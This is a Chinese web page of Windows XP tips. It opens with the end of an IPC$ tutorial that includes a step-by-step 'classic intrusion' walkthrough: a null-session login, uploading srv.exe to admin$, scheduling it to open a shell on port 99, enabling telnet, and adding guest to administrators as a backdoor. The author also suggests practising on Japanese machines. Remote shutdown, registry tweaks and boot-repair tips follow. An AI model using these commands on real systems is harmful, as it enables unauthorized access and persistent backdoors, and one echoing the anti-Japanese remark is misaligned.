pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码
(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net)
八 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
4)删除一个ipc$连接
net use \\IP\ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活
11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
十 总结:
关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.
最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)
学会使用Windows XP的远程关机
[ 作者:佚名 | 转贴自:eNet稻草飞飞 | 点击数:191 | 更新时间:2004-7-27 | 文章录入:晨光 ]
在Windows XP中,新增了一条命令行工具“shutdown”,其作用是“关闭或重新启动本地或远程计算机”。利用它,我们不但可以注销用户,关闭或重新启动计算机,还可以实现定时关机、远程关机。
该命令的语法格式如下:
shutdown [-i -l -s -r -a] [-f] [-m [\\ComputerName> [-t xx] [-c "message"] [-d[u][p]:xx:yy] 其中,各参数的含义为:
-i 显示图形界面的对话框。
-l 注销当前用户,这是默认设置。-m ComputerName 优先。
-s 关闭计算机。
-r 关闭之后重新启动。
-a 中止关闭。除了 -l 和 ComputerName 外,系统将忽略其它参数。在超时期间,您只可以使用 -a。
-f 强制运行要关闭的应用程序。
-m [\\ComputerName] 指定要关闭的计算机。
-t xx 将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。
-c "message" 指定将在“系统关闭”窗口中的“消息”区域显示的消息。最多可以使用 127 个字符。引号中必须包含消息。
-d [u][p]:xx:yy 列出系统关闭的原因代码。
首先,我们来看一下该命令的一些基本用法:
1、注销当前用户
shutdown - l
该命令只能注销本机用户,对远程计算机不适用。
2、关闭本地计算机 shutdown - s
3、重启本地计算机
shutdown - r
4、定时关机
shutdown - s -t 30
指定在30秒之后自动关闭计算机。
5、中止计算机的关闭
有时我们设定了计算机定时关机后,如果出于某种原因又想取消这次关机操作,就可以用 shutdown - a 来中止。如:
shutdown -s C t 300 设定计算机在5分钟后关闭。
Shutdown C a 取消上述关机操作。
以上是shutdown命令在本机中的一些基本应用。前面我们已经介绍过,该命令除了关闭、重启本地计算机外,更重要的是它还能对远程计算机进行操作,但是如何才能实现呢?
在该命令的格式中,有一个参数[-m [\\ComputerName],用它可以指定将要关闭或重启的计算机名称,省略的话则默认为对本机操作。于是,我用以下命令试了一下:
shutdown Cs Cm \\netproxy -t 30
(在30秒内关闭计算机名为netproxy的机器;注:netproxy为局域网内一台同样装有Windows XP的电脑)
但该命令执行后,计算机netproxy一点反应都没有,我的屏幕上却返回这样一句话:Access is denied (拒绝访问)。
为什么会出现这种情况呢?我想了半天,四处查找有关的资料,终于发现,在Windows XP默认的安全策略中,只有管理员组的用户才有权从远端关闭计算机,而一般情况下我们从局域网内的其他电脑来访问该计算机时,则只有guest用户权限,所以当我们执行上述命令时,便会出现“拒绝访问”的情况。
找到问题的根源之后,解决的办法也很简单,只要在客户计算机(能够被远程关闭的计算机,如上述的netproxy)中赋予guest用户远程关机的权限即可。这可利用Windows XP的“组策略”或“管理工具”中的“本地安全策略”来实现。下面以“组策略”为例进行介绍:
1、单击“开始”按钮,选择“运行”,在对话框中输入“gpedit.msc”,然后单击“确定”,打开“组策略编辑器”。
2、在“组策略”窗口的左窗格中打开“计算机配置”—“Windows 设置”—“安全设置”—“本地策略”—“用户权利指派”。(如图)
3、在“组策略”窗口的右窗格中选择“Force shutdown from a remote system (从远端系统强制关机)”,双击。
4、在弹出的对话框中显示目前只有“Administrators”组的成员才有权从远程关机;单击对话框下方的“添加用户或组”按钮,然后在新弹出的对话框中输入“guest”,再单击“确定”。
5、这时在“从远端系统强制关机”的属性中便添加了一个“guest”用户,单击“确定”即可。
6、关闭“组策略”窗中。
通过上述操作后,我们便给计算机netproxy的guest用户授予了远程关机的权限。以后,我们要远程关闭计算机netproxy,只要在网络中其他装有Windows XP 的电脑中输入以下命令即可:
shutdown -s Cm \\netproxy -t 30 (其他参数用法同上)
这时,在netproxy计算机的屏幕上将显示一个“系统关机”的对话框,提示“系统即将关机。请保存所有正在运行的工作,然后注销。未保存的改动将会丢失。关机是由netproxy\guest初始的。”在对话框下方还有一个计时器,显示离关机还有多少时间。在等待关机的时间里,用户还可以执行其他的任务,如关闭程序、打开文件等,但无法关闭该对话框,除非你用shutdown Ca命令来中止关机任务。
最后,有一点要说明的是,shutdown命令不但可以远程关闭装有Windows XP系统的计算机,它还可以远程关闭装有Windows 2000系统的计算机(对于Win9X嘛,好像不适用)。有关Windows 2000客户计算机上的一些设置,操作方法同上,这里就不再多说了。
另外shutdown作为一个外部命令(其对应文件为\Windows\system32文件夹下的shutdown.exe),我们还可将它复制到Windows 2000的机器上,这样,在装有Windows 2000系统的机器之间便也能相互实现远程关机。
4、加快宽带连接速度
〔开始〕→〔运行〕→键入〔gpedit.msc〕打开〔本地计算机策略〕→〔计算机配置〕→〔管理模板〕→〔Network〕→在右边窗口打开〔QoS Packet Scheduler〕→〔limit reservable bandwidth〕→选〔已启用〕→将〔Bandwidth limit %" 〕的数据改为〔0〕→重新启动电脑即可
家用版可按下运行
〔开始〕→〔运行〕→键入〔regedit〕→在〔HKEY_LOCAL_MACHINE〕→〔SOFTWARE〕→〔Policies〕→〔Microsoft〕 →〔Windows〕
增加一个名为〔Psched〕的键值
〔Psched〕右面窗口增加一个 Dword 值〔NonBestEffortLimit〕数值资料为〔0〕
5、加快选单显示速度
〔开始〕→〔运行〕→键入〔Regedit〕→〔HKEY_CURRENT_USER〕→〔Control Panel〕→〔Desktop〕→将字串值〔MenuShowDelay〕的数值资料更改为〔0〕
调整後如觉得菜单显示速度太快而不适应者可将〔MenuShowDelay〕的数值资料更改为〔200〕
重新开机便生效
6、加快自动更新率
〔开始〕→〔运行〕→键入〔Regedit〕→〔HKEY_LOCAL_MACHINE〕→〔System〕→〔CurrentControlSet〕→〔Control〕→〔Update〕
将 Dword〔UpdateMode〕的数值资料更改为〔0〕
重新开机便生效
7、关闭 XP 内设的刻盘功能
如果不打算使用此功能可将其关闭,可加快使用 Nero 刻录软件的速度
〔控制面板〕→〔系统管理工具〕→〔服务〕→在右变窗口选〔IMAPI CD-Burning COM Service〕→〔启动类型〕→选〔已停用〕
[转帖]WinXP:六条未公开的秘技 楼主
1.支持137 GB以上大硬盘
想要使用137 GB以上大硬盘,必须使用48位LBA模式。首先你的主板BIOS必须支持48Bit LBA,其次WinXP 家用版和专业版必须安装SP1补丁。然后打开注册表,在如下路径“HKEY_LOCAL_MACHINE System CurrentControlSet Services Atapi Parameter”找到“EnableBigLba”选项,将
其值由“0”改为“1”。如果该项不存在,可以自建“DWORD值”项目,同样设置.最后重新启动即可。
2.删除共享文档
如果你不需要共享文件,可以这样移除它:进入HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Explorer My computer Namespace DelegateFolders,删除键值“”。
3.锁定桌面
想要锁定桌面不被别人肆意修改,可以使用很多工具例如TweakUI,不过其实在注册表里进行小小的改动即可实现:进入HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Policies Explorer,建立DWORD值“NoDesktop”,将其值修改为“1”即可。
4.停用“上次访问时间标记(Last Access Time Stamp)”
不想要这项功能,可以这样修改:进入HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Control File system,新建DWORD值“NtfsDisableLastAccessUpdate”,将其值修改为“1”即可。
5.设置“远程访问连接服务器(RAS)”
需要的话可以这样修改:进入HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows NT CurrentVersion Winlogon,新建字符串值“KeepRasConnections”,将其值修改为“1”即可。
6.使用明文密码(Lain Text Password)
访问UNIX或者LINUX服务器的时候,有时需要明文密码这在XP下很容易实现:找到“HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services lanmanworkstation parameter enableplaintextpassword”并将其值设置为“1”即可。
修改Windows XP设置技巧集之开关机篇
作者:福建163软件园 来源:http://www.fzsky.net 加入时间:2004-3-6
1、加快XP开机及关机速度
在〔开始〕→〔运行〕→键入〔Regedit〕
找到HKEY_CURRENT_USER\Control Panel\Desktop键,将右边窗口的WaitToKillAppTimeout改为1000
(原设定值:20000 )即关闭程序时仅等待1秒。
将键值HungAppTimeout的数值改为:200(原设定值:5000 ),表示程序出错时等待0.5秒。
找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
将键值WaitToKillServiceTimeout设为:1000或更小。(原设定值:20000 )
将键值〔HungAppTimeout〕的数值资料更改为〔200〕
2、加快预读能力改善开机速度
Windows XP预读设定可提高系统速度,加快开机速度。
在〔开始〕→〔运行〕→键入〔Regedit〕找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ MemoryManagement在PrefetchParameters右边窗口将〔EnablePrefetcher〕的数值资料如下更改:
PIII 800MHz以上的可尝试将数值资料更改为〔4〕或〔5〕
以下的建议保留数值资料为预设值即〔3〕
3、关机时自动关闭停止回应程序
让系统自动关闭停止回应的程序。
打开注册表HKEY_CURRENT_USER\Control Panel\Desktop键,将AutoEndTasks值设为1。(原设定值:0 )
4、在启动电脑时运行Defrag程序
在〔开始〕→〔运行〕→键入〔Regedit〕→〔HKEY_LOCAL_MACHINE〕
→〔SOFTWARE〕→〔Microsoft〕→〔Dfrg〕→〔BootOptimizeFunction〕
将键值〔Enable〕设定为〔Y〕等于开启而设定为〔N〕等于关闭
5、减少多重启动时等待时间
打开开始\控制面板\系统\进阶\启动及修复项目\按设定\系统启动\预设操作系统--两个项目都打勾-填入您想等待的时间ps :假如填入"0"系统将不会让您等待而直接载入您上次选定的操作系统
另一个方法
用Notepad打开在C:\目录下的boot.ini档案,将内容〔timeout〕的设定值由预设的30 (秒)改为要求等待的时间--存档
6、减少Windows XP开机载入区域网络时等待的时间
打开网络连接
用右键查看“本地连接”的“属性”
在一般下面,选“Internet协议(TCP/IP)”按内容
使用固定的IP地址,以后开机就不会停顿了
7、使用微软Bootvis.exe最佳化启动速度
先下载bootVis.exe档案,然后解压后运行〔bootvis.exe〕
在〔Trace〕选〔next boot + driver delays〕或其他选择项目后XP会重新启动并将记录启动资料产生成BIN的文件。
再在〔Bootvis.exe〕→〔file〕→〔open〕中打开这个文件→在〔Trace〕→选〔Optimize system〕
此优化需时颇长,请耐心等待
8、移除启动时载入不需要的程序
如开机时太多程序要运行时会影响开机的速度,先检查那些程序会在开机时运行
在〔开始〕→〔运行〕→键入〔msconfig〕→选〔启动〕
在启动内的程序是代表开机时要运行的程序,如须暂时停止运行某些程序便取消在〔□〕的〔X〕符号便可,如想恢复开机时运行此程序在〔□〕内加回〔X〕符号便可
如希望彻底移除者在〔msconfig〕→〔启动〕的左边栏〔位置〕上便显示引导程序运行的位置
其中:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
其中的〔HKLM〕代表登录档上的〔HKEY_LOCAL_MACHINE〕
在〔Run〕的右边窗口不需要的项目删除
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
其中的〔HKCU〕代表登录档上的〔HKEY_CURRENT_USER〕
在〔Run〕的右边窗口不需要的项目删除
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
则代表登录档的路径如下
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg
检查在〔startupreg〕下的路径,将不需要的项目删除
Common Startup
代表在〔开始〕→〔所有程序〕→〔启动〕的程序
只要在取消在〔msconfig〕→〔启动〕内〔□〕不选〔X〕符号便会代为将程序移离〔启动〕
9、加快开机的时间-停用不需要的服务
Windows在开机时会先载入很多不见得用得到的程序,以下的方法可以让您选择您需要载入的程序,但如您非系统高手不建议您动这个项目:
关掉一些伴随着Windows启动的程序,及常驻程序!!在"开始"--> "运行"中
输入msconfig进入"系统设定公用程序"在"启动"关掉不必要的程序,将方框中的勾勾取消,关掉不
必要的程序,不确定的程序不可以乱关,以免造成Windows错误!!
(先试试是否可以在软件本身取消常驻,不行再用此方法!!),完成后按"套用",重开机!!
10、制做XP开机磁盘
XP要做开机磁盘
把磁盘插入软驱-->按右键-->选格式化-->选建立一个MS-DOS开机磁盘
11、XP的自动关机问题
如果不能自动关机的话
控制面板-->电源-->显示-->屏幕保护程序-->电源管理-->APM打勾
这样应该就可以了
如果还不行,应该是BIOS的问题
12、关机有文本文档
在桌面空白位置按鼠标右键-> <新建> -> 选<文本文档>
键入rundll.exe user.exe,exitwindows
在<选择文本文档的名称>键入<关闭Window>或你想要的名称-> 按<完成>
13、重新启动有文本文档
在桌面空白位置按鼠标右键-> <新建> -> 选<文本文档>
在<命令行>键入rundll.exe user.exe,exitwindowsexec
在<选择文本文档的名称>键入<重新启动Restart>或你想要的名称-> 按<完成>
14、备份及还原窗口启动档
如需重装Windows XP,重装后必须重新启动,如按下列办法可解决此问题
备份
在\Windows\system32目录下将wpa.dbl及Wpa.bak用软盘备份
还原
重装Windows XP后,进入〔安全模式〕,在\Windows\system32目录下将wpa.dbl改名为wpadbl及wpa.bak改名为wpabak
然后将备份的wpa.dbl及Wpa.bak抄回此目录。
重新启动电脑按〔检查Windows XP是否登记〕办法更改登录注册
注:因Windows XP对硬件的更改次数有所限制,所以只适用于重装系统或小量更改硬件。
15、修复Windows XP的启动
由于在安装Windows XP后再安装其他版本的Windows而导致启动后不能进入Windows XP。
原因是当安装其他版本的Windows时,C盘的已被新安装的其他版本Windows取替,除了用其他的软件外,可尝试按以下办法进行修改,此更改不会提供任何支持及仅适用于FAT32格式,Windows 2000因系统较接近Windows XP,因此成功机会大,如属Windows 98或Windows ME未能成功修复者,可使用有关版本的启动磁盘启动电脑后在〔A:\>〕下键入〔Sys :〕后从新开机便可。
被Windows 98或ME占用了启动系统
先预备一张Win98的安装启动磁片。
进入Windows 98或ME用Notepad去编辑一个名为Read.scr内容如下。
-------------------------
L 100 2 0 1
N C:\BOOTSECT.DOS
R BX
0
R CX
200
W
Q
--------------------------
将档案存在Windows 98或ME的安装启动磁片及用此磁片启动电脑
如果C盘下有个名为BOOTSECT.DOS的档案便在A:>下先运行此命令
ATTRIB C:\BOOTSECT.DOS -S -H -R
然后在A:>下键入DEBUG
如刚才修改了BOOTSECT.DOS档案的属性再在A:>下先运行此命令:
ATTRIB C:\BOOTSECT.DOS+S+H+R
在BIOS设定用CD启动电脑,然后将Windows XP光盘放入及启动电脑。
让光盘自动运行至停止便会出现三个选择,按〔R〕选修复电脑便会询问要进入哪个系统,选中你要进入的系统按〔Enter〕键,然后输入Administrator密码(与安装时输入的Administrator密码相同)如果没有密码直接按Enter便可。
在X:\Windows> 下键入Fixboot及按〔Y〕确认。
X = Windows XP所安装驱动器的盘符。
完成后取出Win XP光盘及键入〔Exit〕会重新启动电脑。
在BIOS选回用硬盘启动电脑便可。
如未能正常显示多重启动选单者可修改C盘根目录的Boot.ini档案。
打印本页|寻秦风云记 |设为首页 |加入收藏 |联系我们|
联系地址:湖北宜昌市港窑路52号 联系电话:0717-6076817 联系人:胡友龙
鄂ICP备05027425号
有什么经典的电脑应用小技巧
哪有电脑应用技巧
破解电脑万象网管2004增强版的技巧以及把普通机变成主机的方法(详细)
怎样从电脑上知道电脑的应用技巧?
谁知道有什么网站是教人电脑应用技巧的啊?
怎么样增强谈恋爱的技巧
经典网名全集
经典励志故事全集
solidwords的应用技巧
电子表格应用技巧
EXCEL应用技巧
PowerPoint 的应用技巧
魔鬼的电脑
求奥斯卡金曲全集-经典珍藏版的歌词
百度空间自定义CSS怎样应用(或技巧)?
百度空间自定义CSS怎样应用(或技巧)?
应用经济学经典教程
WinRAR的密码应用技巧?
excel表格的应用技巧
Excel的高级应用技巧
如何在电脑上玩电神魔鬼?
我上次在"电脑爱好者俱乐部"里见到一个关于电脑应用技巧的帖子
数据库的应用update应用经典
电脑技巧